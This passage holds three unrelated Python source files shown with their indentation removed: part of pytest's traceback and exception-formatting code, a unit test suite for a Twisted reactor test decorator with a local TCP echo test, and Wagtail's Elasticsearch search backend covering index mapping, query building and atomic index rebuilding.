path = np
return path
def repr_traceback(self, excinfo):
traceback = excinfo.traceback
if self.tbfilter:
traceback = traceback.filter()
if is_recursion_error(excinfo):
traceback, extraline = self._truncate_recursive_traceback(traceback)
else:
extraline = None
last = traceback[-1]
entries = []
for index, entry in enumerate(traceback):
einfo = (last == entry) and excinfo or None
reprentry = self.repr_traceback_entry(entry, einfo)
entries.append(reprentry)
return ReprTraceback(entries, extraline, style=self.style)
def _truncate_recursive_traceback(self, traceback):
"""
Truncate the given recursive traceback trying to find the starting point
of the recursion.
The detection is done by going through each traceback entry and finding the
point in which the locals of the frame are equal to the locals of a previous frame (see ``recursionindex()``).
Handle the situation where the recursion process might raise an exception (for example
comparing numpy arrays using equality raises a TypeError), in which case we do our best to
warn the user of the error and show a limited traceback.
"""
try:
recursionindex = traceback.recursionindex()
except Exception as e:
max_frames = 10
extraline = (
'!!! Recursion error detected, but an error occurred locating the origin of recursion.\n'
' The following exception happened when comparing locals in the stack frame:\n'
' {exc_type}: {exc_msg}\n'
' Displaying first and last {max_frames} stack frames out of {total}.'
).format(exc_type=type(e).__name__, exc_msg=safe_str(e), max_frames=max_frames, total=len(traceback))
traceback = traceback[:max_frames] + traceback[-max_frames:]
else:
if recursionindex is not None:
extraline = "!!! Recursion detected (same locals & position)"
traceback = traceback[:recursionindex + 1]
else:
extraline = None
return traceback, extraline
def repr_excinfo(self, excinfo):
if _PY2:
reprtraceback = self.repr_traceback(excinfo)
reprcrash = excinfo._getreprcrash()
return ReprExceptionInfo(reprtraceback, reprcrash)
else:
repr_chain = []
e = excinfo.value
descr = None
while e is not None:
if excinfo:
reprtraceback = self.repr_traceback(excinfo)
reprcrash = excinfo._getreprcrash()
else:
# fallback to native repr if the exception doesn't have a traceback:
# ExceptionInfo objects require a full traceback to work
reprtraceback = ReprTracebackNative(traceback.format_exception(type(e), e, None))
reprcrash = None
repr_chain += [(reprtraceback, reprcrash, descr)]
if e.__cause__ is not None:
e = e.__cause__
excinfo = ExceptionInfo((type(e), e, e.__traceback__)) if e.__traceback__ else None
descr = 'The above exception was the direct cause of the following exception:'
elif (e.__context__ is not None and not e.__suppress_context__):
e = e.__context__
excinfo = ExceptionInfo((type(e), e, e.__traceback__)) if e.__traceback__ else None
descr = 'During handling of the above exception, another exception occurred:'
else:
e = None
repr_chain.reverse()
return ExceptionChainRepr(repr_chain)
class TerminalRepr(object):
def __str__(self):
s = self.__unicode__()
if _PY2:
s = s.encode('utf-8')
return s
def __unicode__(self):
# FYI this is called from pytest-xdist's serialization of exception
# information.
io = py.io.TextIO()
tw = py.io.TerminalWriter(file=io)
self.toterminal(tw)
return io.getvalue().strip()
def __repr__(self):
return "<%s instance at %0x>" % (self.__class__, id(self))
class ExceptionRepr(TerminalRepr):
def __init__(self):
self.sections = []
def addsection(self, name, content, sep="-"):
self.sections.append((name, content, sep))
def toterminal(self, tw):
for name, content, sep in self.sections:
tw.sep(sep, name)
tw.line(content)
class ExceptionChainRepr(ExceptionRepr):
def __init__(self, chain):
super(ExceptionChainRepr, self).__init__()
self.chain = chain
# reprcrash and reprtraceback of the outermost (the newest) exception
# in the chain
self.reprtraceback = chain[-1][0]
self.reprcrash = chain[-1][1]
def toterminal(self, tw):
for element in self.chain:
element[0].toterminal(tw)
if element[2] is not None:
tw.line("")
tw.line(element[2], yellow=True)
super(ExceptionChainRepr, self).toterminal(tw)
class ReprExceptionInfo(ExceptionRepr):
def __init__(self, reprtraceback, reprcrash):
super(ReprExceptionInfo, self).__init__()
self.reprtraceback = reprtraceback
self.reprcrash = reprcrash
def toterminal(self, tw):
self.reprtraceback.toterminal(tw)
super(ReprExceptionInfo, self).toterminal(tw)
class ReprTraceback(TerminalRepr):
entrysep = "_ "
def __init__(self, reprentries, extraline, style):
self.reprentries = reprentries
self.extraline = extraline
self.style = style
def toterminal(self, tw):
# the entries might have different styles
for i, entry in enumerate(self.reprentries):
if entry.style == "long":
tw.line("")
entry.toterminal(tw)
if i < len(self.reprentries) - 1:
next_entry = self.reprentries[i + 1]
if entry.style == "long" or \
entry.style == "short" and next_entry.style == "long":
tw.sep(self.entrysep)
if self.extraline:
tw.line(self.extraline)
class ReprTracebackNative(ReprTraceback):
def __init__(self, tblines):
self.style = "native"
self.reprentries = [ReprEntryNative(tblines)]
self.extraline = None
class ReprEntryNative(TerminalRepr):
style = "native"
def __init__(self, tblines):
self.lines = tblines
def toterminal(self, tw):
tw.write("".join(self.lines))
class ReprEntry(TerminalRepr):
localssep = "_ "
def __init__(self, lines, reprfuncargs, reprlocals, filelocrepr, style):
self.lines = lines
self.reprfuncargs = reprfuncargs
self.reprlocals = reprlocals
self.reprfileloc = filelocrepr
self.style = style
def toterminal(self, tw):
if self.style == "short":
self.reprfileloc.toterminal(tw)
for line in self.lines:
red = line.startswith("E ")
tw.line(line, bold=True, red=red)
# tw.line("")
return
if self.reprfuncargs:
self.reprfuncargs.toterminal(tw)
for line in self.lines:
red = line.startswith("E ")
tw.line(line, bold=True, red=red)
if self.reprlocals:
# tw.sep(self.localssep, "Locals")
tw.line("")
self.reprlocals.toterminal(tw)
if self.reprfileloc:
if self.lines:
tw.line("")
self.reprfileloc.toterminal(tw)
def __str__(self):
return "%s\n%s\n%s" % ("\n".join(self.lines),
self.reprlocals,
self.reprfileloc)
class ReprFileLocation(TerminalRepr):
def __init__(self, path, lineno, message):
self.path = str(path)
self.lineno = lineno
self.message = message
def toterminal(self, tw):
# filename and lineno output for each entry,
# using an output format that most editors understand
msg = self.message
i = msg.find("\n")
if i != -1:
msg = msg[:i]
tw.write(self.path, bold=True, red=True)
tw.line(":%s: %s" % (self.lineno, msg))
class ReprLocals(TerminalRepr):
def __init__(self, lines):
self.lines = lines
def toterminal(self, tw):
for line in self.lines:
tw.line(line)
class ReprFuncArgs(TerminalRepr):
def __init__(self, args):
self.args = args
def toterminal(self, tw):
if self.args:
linesofar = ""
for name, value in self.args:
ns = "%s = %s" % (safe_str(name), safe_str(value))
if len(ns) + len(linesofar) + 2 > tw.fullwidth:
if linesofar:
tw.line(linesofar)
linesofar = ns
else:
if linesofar:
linesofar += ", " + ns
else:
linesofar = ns
if linesofar:
tw.line(linesofar)
tw.line("")
def getrawcode(obj, trycall=True):
""" return code object for given function. """
try:
return obj.__code__
except AttributeError:
obj = getattr(obj, 'im_func', obj)
obj = getattr(obj, 'func_code', obj)
obj = getattr(obj, 'f_code', obj)
obj = getattr(obj, '__code__', obj)
if trycall and not hasattr(obj, 'co_firstlineno'):
if hasattr(obj, '__call__') and not inspect.isclass(obj):
x = getrawcode(obj.__call__, trycall=False)
if hasattr(x, 'co_firstlineno'):
return x
return obj
if PY35: # RecursionError introduced in 3.5
def is_recursion_error(excinfo):
return excinfo.errisinstance(RecursionError) # noqa
else:
def is_recursion_error(excinfo):
if not excinfo.errisinstance(RuntimeError):
return False
try:
return "maximum recursion depth exceeded" in str(excinfo.value)
except UnicodeError:
return False
|
|
# Copyright (c) 2014 Stefan C. Mueller
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import unittest
import sys
from twisted.internet import defer
from twisted.internet import protocol, reactor, task
from twisted.python.failure import Failure
from twisted.trial.util import DirtyReactorAggregateError
from twisted.internet.protocol import ClientFactory
from twisted.internet.endpoints import TCP4ServerEndpoint, TCP4ClientEndpoint
from utwist import with_reactor
from twisted.internet.defer import CancelledError
class TestUTwist(unittest.TestCase):
"""
Unit-tests for the :func:`utwist.with_reactor` decorator.
"""
def test_forwards_exceptions(self):
"""
Checks that test errors are passed through.
"""
@with_reactor
def test():
raise ValueError()
self.assertRaises(ValueError, test)
def test_forwards_returnvalue(self):
"""
Checks that return values are passed through (although
this is probably not used in most test frameworks).
"""
@with_reactor
def test():
return 42
self.assertEqual(42, test())
def test_reactor_running(self):
"""
Reactor should be running. Not a very strong test,
since the reactor is started on the first test only,
but we can check anyways.
"""
@with_reactor
def test():
self.assertTrue(reactor.running)
test()
def test_timeout(self):
"""
Checks that timeout causes a test to fail.
Also checks that the default timeout can be overwritten.
"""
@with_reactor(timeout=0.01)
def test():
def nop():
return
return task.deferLater(reactor, 1, nop)
self.assertRaises(CancelledError, test)
def test_no_timeout(self):
"""
Checks that a timeout of zero is not interpreted
literally.
"""
@with_reactor(timeout=0)
def test():
def nop():
return
return task.deferLater(reactor, 0.1, nop)
test()
def test_deferred_success(self):
"""
Checks that we can return a value via a deferred.
"""
@with_reactor
def test():
return defer.succeed(42)
self.assertEqual(42, test())
def test_deferred_failure(self):
"""
Checks that we can fail a test by returning
a failure via a deferred.
"""
@with_reactor
def test():
return defer.fail(Failure(ValueError()))
self.assertRaises(ValueError, test)
def test_failure(self):
"""
Checks that we can fail a test by returning
a failure directly.
"""
@with_reactor
def test():
return Failure(ValueError())
self.assertRaises(ValueError, test)
def test_pending_call(self):
"""
Checks that leftover pending calls result in a dirty-reactor
failure.
"""
@with_reactor
def test():
def later():
pass
reactor.callLater(1, later)
self.assertRaises(DirtyReactorAggregateError, test)
def test_setup_called(self):
"""
Checks that `twisted_setup()` is called before the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_setup(self):
self.called = True
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertTrue(case.test())
def test_teardown_called(self):
"""
Checks that `twisted_teardown()` is called after the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
self.called = True
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertFalse(case.test())
self.assertTrue(case.called)
def test_teardown_after_failure(self):
"""
Checks that `twisted_teardown()` is called even if the
test failed.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
self.called = True
@with_reactor
def test(self):
raise ValueError()
case = TestClass()
self.assertRaises(ValueError, case.test)
self.assertTrue(case.called)
def test_teardown_fails_after_failure(self):
"""
If the test fails and the teardown fails, the
failure of the test must be reported.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
raise TypeError()
@with_reactor
def test(self):
raise ValueError()
case = TestClass()
self.assertRaises(ValueError, case.test)
def test_setup_delegate(self):
"""
Check that if setup returns a deferred,
we wait until it has completed before running
the test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_setup(self):
def later():
self.called = True
return task.deferLater(reactor, 0.01, later)
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertTrue(case.test())
def test_teardown_delegate(self):
"""
Check that if teardown returns a deferred,
we wait for it before finishing the
test.
"""
class TestClass(object):
def __init__(self):
self.called = False
def twisted_teardown(self):
def later():
self.called = True
return task.deferLater(reactor, 0.01, later)
@with_reactor
def test(self):
return self.called
case = TestClass()
self.assertFalse(case.test())
self.assertTrue(case.called)
def test_spawnProcess(self):
"""
Integration test.
Checks that we can start a process and detect when it exits.
If this test fails with a timeout, then there is very likely
something broken with the interrupt handling.
"""
class DummyProcessProtocol(protocol.ProcessProtocol):
def processEnded(self, status):
process_end.callback(None)
@with_reactor
def test():
reactor.spawnProcess(DummyProcessProtocol(), sys.executable, ['python', '-c', 'print("hello")'])
return process_end
process_end = defer.Deferred()
test()
def test_tcp_echo(self):
"""
Integration test.
Checks if we can open a TCP port, connect to it, send data in both
directions, and close both connection and port.
"""
@with_reactor
def test():
class Echo(protocol.Protocol):
def dataReceived(self, data):
self.transport.write(data)
class SayX(protocol.Protocol):
def __init__(self):
self.data_deferred = defer.Deferred()
def connectionMade(self):
self.transport.write("X")
def dataReceived(self, data):
self.transport.loseConnection()
self.data_deferred.callback(data)
def open_port():
echo_factory = ClientFactory()
echo_factory.protocol = Echo
endpoint = TCP4ServerEndpoint(reactor, 0, interface='127.0.0.1')
d = endpoint.listen(echo_factory)
d.addCallback(port_open)
return d
def port_open(listening_port):
port = listening_port.getHost().port
return connect(port, listening_port)
def connect(port, listening_port):
sayx_factory = ClientFactory()
sayx_factory.protocol = SayX
endpoint = TCP4ClientEndpoint(reactor, '127.0.0.1', port)
d = endpoint.connect(sayx_factory)
d.addCallback(connected, listening_port)
return d
def connected(sayx_protocol, listening_port):
d = sayx_protocol.data_deferred
d.addCallback(disconnected, listening_port)
return d
def disconnected(data, listening_port):
self.assertEqual("X", data)
return listening_port.stopListening()
return open_port()
test()
|
|
from __future__ import absolute_import, unicode_literals
import json
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.crypto import get_random_string
from django.utils.six.moves.urllib.parse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
from elasticsearch.helpers import bulk
from wagtail.wagtailsearch.index import (
FilterField, Indexed, RelatedFields, SearchField, class_is_indexed)
from .base import BaseSearchBackend, BaseSearchQuery, BaseSearchResults
class ElasticsearchMapping(object):
type_map = {
'AutoField': 'integer',
'BinaryField': 'binary',
'BooleanField': 'boolean',
'CharField': 'string',
'CommaSeparatedIntegerField': 'string',
'DateField': 'date',
'DateTimeField': 'date',
'DecimalField': 'double',
'FileField': 'string',
'FilePathField': 'string',
'FloatField': 'double',
'IntegerField': 'integer',
'BigIntegerField': 'long',
'IPAddressField': 'string',
'GenericIPAddressField': 'string',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer',
'PositiveSmallIntegerField': 'integer',
'SlugField': 'string',
'SmallIntegerField': 'integer',
'TextField': 'string',
'TimeField': 'date',
}
# Contains the configuration required to use the edgengram_analyzer
# on a field. It's different in Elasticsearch 2 so it's been put in
# an attribute here to make it easier to override in a subclass.
edgengram_analyzer_config = {
'index_analyzer': 'edgengram_analyzer',
}
def __init__(self, model):
self.model = model
def get_parent(self):
for base in self.model.__bases__:
if issubclass(base, Indexed) and issubclass(base, models.Model):
return type(self)(base)
def get_document_type(self):
return self.model.indexed_get_content_type()
def get_field_column_name(self, field):
if isinstance(field, FilterField):
return field.get_attname(self.model) + '_filter'
elif isinstance(field, SearchField):
return field.get_attname(self.model)
elif isinstance(field, RelatedFields):
return field.field_name
def get_field_mapping(self, field):
if isinstance(field, RelatedFields):
mapping = {'type': 'nested', 'properties': {}}
nested_model = field.get_field(self.model).related_model
nested_mapping = type(self)(nested_model)
for sub_field in field.fields:
sub_field_name, sub_field_mapping = nested_mapping.get_field_mapping(sub_field)
mapping['properties'][sub_field_name] = sub_field_mapping
return self.get_field_column_name(field), mapping
else:
mapping = {'type': self.type_map.get(field.get_type(self.model), 'string')}
if isinstance(field, SearchField):
if field.boost:
mapping['boost'] = field.boost
if field.partial_match:
mapping.update(self.edgengram_analyzer_config)
mapping['include_in_all'] = True
elif isinstance(field, FilterField):
mapping['index'] = 'not_analyzed'
mapping['include_in_all'] = False
if 'es_extra' in field.kwargs:
for key, value in field.kwargs['es_extra'].items():
mapping[key] = value
return self.get_field_column_name(field), mapping
def get_mapping(self):
# Make field list
fields = {
'pk': dict(type='string', index='not_analyzed', store='yes', include_in_all=False),
'content_type': dict(type='string', index='not_analyzed', include_in_all=False),
'_partials': dict(type='string', include_in_all=False),
}
fields['_partials'].update(self.edgengram_analyzer_config)
fields.update(dict(
self.get_field_mapping(field) for field in self.model.get_search_fields()
))
return {
self.get_document_type(): {
'properties': fields,
}
}
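# Illustration only (hypothetical model): for a BlogPage model declaring
# SearchField('title', partial_match=True, boost=2) and FilterField('live'),
# get_mapping() would return roughly:
#
#   {'demo_blogpage': {'properties': {
#       'pk': {'type': 'string', 'index': 'not_analyzed', ...},
#       'content_type': {'type': 'string', 'index': 'not_analyzed', ...},
#       '_partials': {'type': 'string', 'index_analyzer': 'edgengram_analyzer', ...},
#       'title': {'type': 'string', 'boost': 2, 'include_in_all': True,
#                 'index_analyzer': 'edgengram_analyzer'},
#       'live_filter': {'type': 'boolean', 'index': 'not_analyzed',
#                       'include_in_all': False},
#   }}}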
def get_document_id(self, obj):
return obj.indexed_get_toplevel_content_type() + ':' + str(obj.pk)
def _get_nested_document(self, fields, obj):
doc = {}
partials = []
model = type(obj)
mapping = type(self)(model)
for field in fields:
value = field.get_value(obj)
doc[mapping.get_field_column_name(field)] = value
# Check if this field should be added into _partials
if isinstance(field, SearchField) and field.partial_match:
partials.append(value)
return doc, partials
def get_document(self, obj):
# Build document
doc = dict(pk=str(obj.pk), content_type=self.model.indexed_get_content_type())
partials = []
for field in self.model.get_search_fields():
value = field.get_value(obj)
if isinstance(field, RelatedFields):
if isinstance(value, models.Manager):
nested_docs = []
for nested_obj in value.all():
nested_doc, extra_partials = self._get_nested_document(field.fields, nested_obj)
nested_docs.append(nested_doc)
partials.extend(extra_partials)
value = nested_docs
elif isinstance(value, models.Model):
value, extra_partials = self._get_nested_document(field.fields, value)
partials.extend(extra_partials)
doc[self.get_field_column_name(field)] = value
# Check if this field should be added into _partials
if isinstance(field, SearchField) and field.partial_match:
partials.append(value)
# Add partials to document
doc['_partials'] = partials
return doc
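# Illustration only: for the hypothetical BlogPage above, with pk=42,
# title='Hello' and live=True, get_document() would return roughly
# {'pk': '42', 'content_type': 'demo_blogpage', 'title': 'Hello',
#  'live_filter': True, '_partials': ['Hello']}.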
def __repr__(self):
return '<ElasticsearchMapping: {}>'.format(self.model.__name__)
class ElasticsearchSearchQuery(BaseSearchQuery):
mapping_class = ElasticsearchMapping
DEFAULT_OPERATOR = 'or'
def __init__(self, *args, **kwargs):
super(ElasticsearchSearchQuery, self).__init__(*args, **kwargs)
self.mapping = self.mapping_class(self.queryset.model)
# Convert field names into index column names
if self.fields:
fields = []
searchable_fields = {f.field_name: f for f in self.queryset.model.get_searchable_search_fields()}
for field_name in self.fields:
if field_name in searchable_fields:
field_name = self.mapping.get_field_column_name(searchable_fields[field_name])
fields.append(field_name)
self.fields = fields
def _process_lookup(self, field, lookup, value):
column_name = self.mapping.get_field_column_name(field)
if lookup == 'exact':
if value is None:
return {
'missing': {
'field': column_name,
}
}
else:
return {
'term': {
column_name: value,
}
}
if lookup == 'isnull':
if value:
return {
'missing': {
'field': column_name,
}
}
else:
return {
'not': {
'missing': {
'field': column_name,
}
}
}
if lookup in ['startswith', 'prefix']:
return {
'prefix': {
column_name: value,
}
}
if lookup in ['gt', 'gte', 'lt', 'lte']:
return {
'range': {
column_name: {
lookup: value,
}
}
}
if lookup == 'range':
lower, upper = value
return {
'range': {
column_name: {
'gte': lower,
'lte': upper,
}
}
}
if lookup == 'in':
return {
'terms': {
column_name: list(value),
}
}
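# Illustration only, for a hypothetical FilterField whose column name is
# 'live_filter':
#   ('exact', True)  -> {'term': {'live_filter': True}}
#   ('isnull', True) -> {'missing': {'field': 'live_filter'}}
#   ('gt', 5)        -> {'range': {'live_filter': {'gt': 5}}}
#   ('in', [1, 2])   -> {'terms': {'live_filter': [1, 2]}}
# Unknown lookups fall through and return None.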
def _connect_filters(self, filters, connector, negated):
if filters:
if len(filters) == 1:
filter_out = filters[0]
else:
filter_out = {
connector.lower(): [
fil for fil in filters if fil is not None
]
}
if negated:
filter_out = {
'not': filter_out
}
return filter_out
def get_inner_query(self):
if self.query_string is not None:
fields = self.fields or ['_all', '_partials']
if len(fields) == 1:
if self.operator == 'or':
query = {
'match': {
fields[0]: self.query_string,
}
}
else:
query = {
'match': {
fields[0]: {
'query': self.query_string,
'operator': self.operator,
}
}
}
else:
query = {
'multi_match': {
'query': self.query_string,
'fields': fields,
}
}
if self.operator != 'or':
query['multi_match']['operator'] = self.operator
else:
query = {
'match_all': {}
}
return query
def get_content_type_filter(self):
return {
'prefix': {
'content_type': self.queryset.model.indexed_get_content_type()
}
}
def get_filters(self):
filters = []
# Filter by content type
filters.append(self.get_content_type_filter())
# Apply filters from queryset
queryset_filters = self._get_filters_from_queryset()
if queryset_filters:
filters.append(queryset_filters)
return filters
def get_query(self):
inner_query = self.get_inner_query()
filters = self.get_filters()
if len(filters) == 1:
return {
'filtered': {
'query': inner_query,
'filter': filters[0],
}
}
elif len(filters) > 1:
return {
'filtered': {
'query': inner_query,
'filter': {
'and': filters,
}
}
}
else:
return inner_query
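# Illustration only: searching for 'hello' on a hypothetical BlogPage
# queryset with no extra filters would produce roughly:
#   {'filtered': {
#       'query': {'multi_match': {'query': 'hello',
#                                 'fields': ['_all', '_partials']}},
#       'filter': {'prefix': {'content_type': 'demo_blogpage'}}}}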
def get_sort(self):
# Ordering by relevance is the default in Elasticsearch
if self.order_by_relevance:
return
# Get queryset and make sure its ordered
if self.queryset.ordered:
order_by_fields = self.queryset.query.order_by
sort = []
for order_by_field in order_by_fields:
reverse = False
field_name = order_by_field
if order_by_field.startswith('-'):
reverse = True
field_name = order_by_field[1:]
field = self._get_filterable_field(field_name)
column_name = self.mapping.get_field_column_name(field)
sort.append({
column_name: 'desc' if reverse else 'asc'
})
return sort
else:
# Order by pk field
return ['pk']
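# Illustration only: a queryset ordered by '-title' would yield
# [{'title_filter': 'desc'}], assuming 'title' is also declared as a
# FilterField (hypothetical); an unordered queryset falls back to ['pk'].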
def __repr__(self):
return json.dumps(self.get_query())
class ElasticsearchSearchResults(BaseSearchResults):
def __init__(self, *args, **kwargs):
super(ElasticsearchSearchResults, self).__init__(*args, **kwargs)
self.highlight_params = {}
def highlight(self, **kwargs):
# It's possible to pass list of dicts and dict as the fields param
fields = kwargs.get('fields', [])
if isinstance(fields, dict):
fields = [{k: v} for k, v in fields.items()]
post_processed_fields = {}
for field_def in fields:
field_name = list(field_def.keys())[0] if isinstance(field_def, dict) and len(field_def) else None
if field_name:
# Use wildcard column name on request. This allows us to query against all content types.
# Alternative solution: get all indexed models and add all possible column names into request.
field_column_name = '*{}'.format(field_name)
post_processed_field_def = {
field_column_name: field_def[field_name]
}
post_processed_fields[field_name] = post_processed_field_def
self.highlight_params['fields'] = post_processed_fields
self.highlight_params['require_field_match'] = kwargs.get('require_field_match', None)
return self
def _clone(self):
new = super(ElasticsearchSearchResults, self)._clone()
new.highlight_params = self.highlight_params
return new
def _get_es_body(self, for_count=False):
body = {
'query': self.query.get_query()
}
if not for_count:
sort = self.query.get_sort()
if sort is not None:
body['sort'] = sort
# Add highlighting into a body, if fields are specified
if self.highlight_params.get('fields'):
highlight = {
'fields': list(self.highlight_params['fields'].values()),
}
if self.highlight_params['require_field_match'] is not None:
highlight.update({
'require_field_match': self.highlight_params['require_field_match'],
})
body['highlight'] = highlight
return body
def _get_content_type(self, content_type):
app_label, model = content_type.rsplit('_', 2)[-2:]
return ContentType.objects.get_by_natural_key(app_label, model)
def _do_search(self):
# Params for elasticsearch query
params = dict(
index=self.backend.get_index_for_model(self.query.queryset.model).name,
body=self._get_es_body(),
_source=False,
fields=['pk', 'content_type'],
from_=self.start,
)
# Add size if set
if self.stop is not None:
params['size'] = self.stop - self.start
# Send to Elasticsearch
hits = self.backend.es.search(**params)
pks = []
data_by_pk = {}
for hit in hits['hits']['hits']:
# Get pks from results
pk = hit['fields']['pk'][0]
pks.append(pk)
# Get content type
data_by_pk.setdefault(pk, {})
data_by_pk[pk]['content_type'] = self._get_content_type(hit['fields']['content_type'][0])
# Get highlight
data_by_pk[pk]['highlight'] = hit.get('highlight', {})
# Initialise results dictionary
results = dict((str(pk), None) for pk in pks)
# Find objects in database and add them to dict
queryset = self.query.queryset.filter(pk__in=pks)
for obj in queryset:
str_pk = str(obj.pk)
fields_to_highlight = self.highlight_params.get('fields', {}).keys()
if fields_to_highlight:
obj_model = data_by_pk[str_pk]['content_type'].model_class()
obj_mapping = self.backend.mapping_class(obj_model)
searchable_search_fields = {f.field_name: f for f in obj_model.get_searchable_search_fields()}
for field_name in fields_to_highlight:
highlighted_field = None
field = searchable_search_fields.get(field_name)
if field:
field_column_name = obj_mapping.get_field_column_name(field)
highlighted_field = data_by_pk[str_pk]['highlight'].get(field_column_name, [None])[0]
setattr(obj, '{}_highlight'.format(field_name), highlighted_field)
results[str_pk] = obj
# Return results in order given by Elasticsearch
return [results[str(pk)] for pk in pks if results[str(pk)]]
def _do_count(self):
# Get count
hit_count = self.backend.es.count(
index=self.backend.get_index_for_model(self.query.queryset.model).name,
body=self._get_es_body(for_count=True),
)['count']
# Add limits
hit_count -= self.start
if self.stop is not None:
hit_count = min(hit_count, self.stop - self.start)
return max(hit_count, 0)
class ElasticsearchIndex(object):
def __init__(self, backend, name):
self.backend = backend
self.es = backend.es
self.mapping_class = backend.mapping_class
self.name = name
def put(self):
self.es.indices.create(self.name, self.backend.settings)
def delete(self):
try:
self.es.indices.delete(self.name)
except NotFoundError:
pass
def exists(self):
return self.es.indices.exists(self.name)
def is_alias(self):
return self.es.indices.exists_alias(self.name)
def aliased_indices(self):
"""
If this index object represents an alias (which appears the same in the
Elasticsearch API), this method can be used to fetch the list of indices
the alias points to.
Use the is_alias method if you need to find out if this is an alias.
This returns an empty list if called on a regular index.
"""
return [
self.backend.index_class(self.backend, index_name)
for index_name in self.es.indices.get_alias(name=self.name).keys()
]
def put_alias(self, name):
"""
Creates a new alias to this index. If the alias already exists it will
be repointed to this index.
"""
self.es.indices.put_alias(name=name, index=self.name)
def add_model(self, model):
# Get mapping
mapping = self.mapping_class(model)
# Put mapping
self.es.indices.put_mapping(
index=self.name, doc_type=mapping.get_document_type(), body=mapping.get_mapping()
)
def add_item(self, item):
# Make sure the object can be indexed
if not class_is_indexed(item.__class__):
return
# Get mapping
mapping = self.mapping_class(item.__class__)
# Add document to index
self.es.index(
self.name, mapping.get_document_type(), mapping.get_document(item), id=mapping.get_document_id(item)
)
def add_items(self, model, items):
if not class_is_indexed(model):
return
# Get mapping
mapping = self.mapping_class(model)
doc_type = mapping.get_document_type()
# Create list of actions
actions = []
for item in items:
# Create the action
action = {
'_index': self.name,
'_type': doc_type,
'_id': mapping.get_document_id(item),
}
action.update(mapping.get_document(item))
actions.append(action)
# Run the actions
bulk(self.es, actions)
def delete_item(self, item):
# Make sure the object can be indexed
if not class_is_indexed(item.__class__):
return
# Get mapping
mapping = self.mapping_class(item.__class__)
# Delete document
try:
self.es.delete(
self.name,
mapping.get_document_type(),
mapping.get_document_id(item),
)
except NotFoundError:
pass # Document doesn't exist, ignore this exception
def refresh(self):
self.es.indices.refresh(self.name)
def reset(self):
# Delete old index
self.delete()
# Create new index
self.put()
class ElasticsearchIndexRebuilder(object):
def __init__(self, index):
self.index = index
def reset_index(self):
self.index.reset()
def start(self):
# Reset the index
self.reset_index()
return self.index
def finish(self):
self.index.refresh()
class ElasticsearchAtomicIndexRebuilder(ElasticsearchIndexRebuilder):
def __init__(self, index):
self.alias = index
self.index = index.backend.index_class(
index.backend,
self.alias.name + '_' + get_random_string(7).lower()
)
def reset_index(self):
# Delete old index using the alias
# This should delete both the alias and the index
self.alias.delete()
# Create new index
self.index.put()
# Create a new alias
self.index.put_alias(self.alias.name)
def start(self):
# Create the new index
self.index.put()
return self.index
def finish(self):
self.index.refresh()
if self.alias.is_alias():
# Update the existing alias, then delete the old indices
# Find the indices the alias currently points to; we'll delete
# them after updating the alias
old_index = self.alias.aliased_indices()
# Update alias to point to new index
self.index.put_alias(self.alias.name)
# Delete old index
# aliased_indices() can return multiple indices. Delete them all
for index in old_index:
if index.name != self.index.name:
index.delete()
else:
# self.alias doesn't currently refer to an alias in Elasticsearch.
# This means that either nothing exists in ES with that name or
# there is currently an index with that name
# Run delete on the alias, just in case it is currently an index.
# This happens on the first rebuild after switching ATOMIC_REBUILD on
self.alias.delete()
# Create the alias
self.index.put_alias(self.alias.name)
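# Illustrative (not executed) sketch of an atomic rebuild with the class
# above; 'backend' is assumed to be a configured ElasticsearchSearchBackend
# and SomeModel a hypothetical indexed model:
#
#   rebuilder = backend.get_rebuilder()  # atomic variant if ATOMIC_REBUILD is on
#   index = rebuilder.start()            # creates e.g. 'wagtail_ab12cd3'
#   index.add_model(SomeModel)
#   index.add_items(SomeModel, list(SomeModel.objects.all()))
#   rebuilder.finish()                   # repoints the alias, deletes old indices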
class ElasticsearchSearchBackend(BaseSearchBackend):
index_class = ElasticsearchIndex
query_class = ElasticsearchSearchQuery
results_class = ElasticsearchSearchResults
mapping_class = ElasticsearchMapping
basic_rebuilder_class = ElasticsearchIndexRebuilder
atomic_rebuilder_class = ElasticsearchAtomicIndexRebuilder
settings = {
'settings': {
'analysis': {
'analyzer': {
'ngram_analyzer': {
'type': 'custom',
'tokenizer': 'lowercase',
'filter': ['asciifolding', 'ngram']
},
'edgengram_analyzer': {
'type': 'custom',
'tokenizer': 'lowercase',
'filter': ['asciifolding', 'edgengram']
}
},
'tokenizer': {
'ngram_tokenizer': {
'type': 'nGram',
'min_gram': 3,
'max_gram': 15,
},
'edgengram_tokenizer': {
'type': 'edgeNGram',
'min_gram': 2,
'max_gram': 15,
'side': 'front'
}
},
'filter': {
'ngram': {
'type': 'nGram',
'min_gram': 3,
'max_gram': 15
},
'edgengram': {
'type': 'edgeNGram',
'min_gram': 1,
'max_gram': 15
}
}
}
}
}
def __init__(self, params):
super(ElasticsearchSearchBackend, self).__init__(params)
# Get settings
self.hosts = params.pop('HOSTS', None)
self.index_name = params.pop('INDEX', 'wagtail')
